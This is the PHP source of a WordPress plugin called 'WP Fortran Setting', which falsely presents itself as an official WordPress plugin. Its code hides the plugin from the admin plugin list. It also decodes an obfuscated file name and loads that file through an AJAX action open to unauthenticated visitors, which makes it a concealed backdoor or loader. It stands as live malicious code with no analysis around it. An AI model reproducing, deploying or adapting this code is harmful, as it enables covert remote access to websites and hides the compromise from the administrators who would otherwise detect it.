<?php
/*
Plugin Name: WP Fortran Setting
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 19.6.8
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function nnx_rgg() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-fortran-setting/wp-fortran-setting.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

add_action('pre_current_active_plugins', 'nnx_rgg');

function syk_rvy($plugins) {
    $p = 'wp-fortran-setting/wp-fortran-setting.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

add_filter('all_plugins', 'syk_rvy');

function fli($f, $d) {
    $r = '';
    for ($i = 0; $i < strlen($f); $i += 2) {
        $v = ord($f[$i]) - 65;
        $b = ord($f[$i + 1]);
        if ($b > 90) $b -= 6;
        $s = $v * 52 + ($b - 65);
        $r .= chr($s - $d);
    }
    return $r;
}

function xnl_ajax_handler() {
    require plugin_dir_path(__FILE__) . fli('CmDEDCDDCyCwBlCmDCDC', 43);
    wp_die();
}

add_action('wp_ajax_wp-enx', 'xnl_ajax_handler');
add_action('wp_ajax_nopriv_wp-enx', 'xnl_ajax_handler');
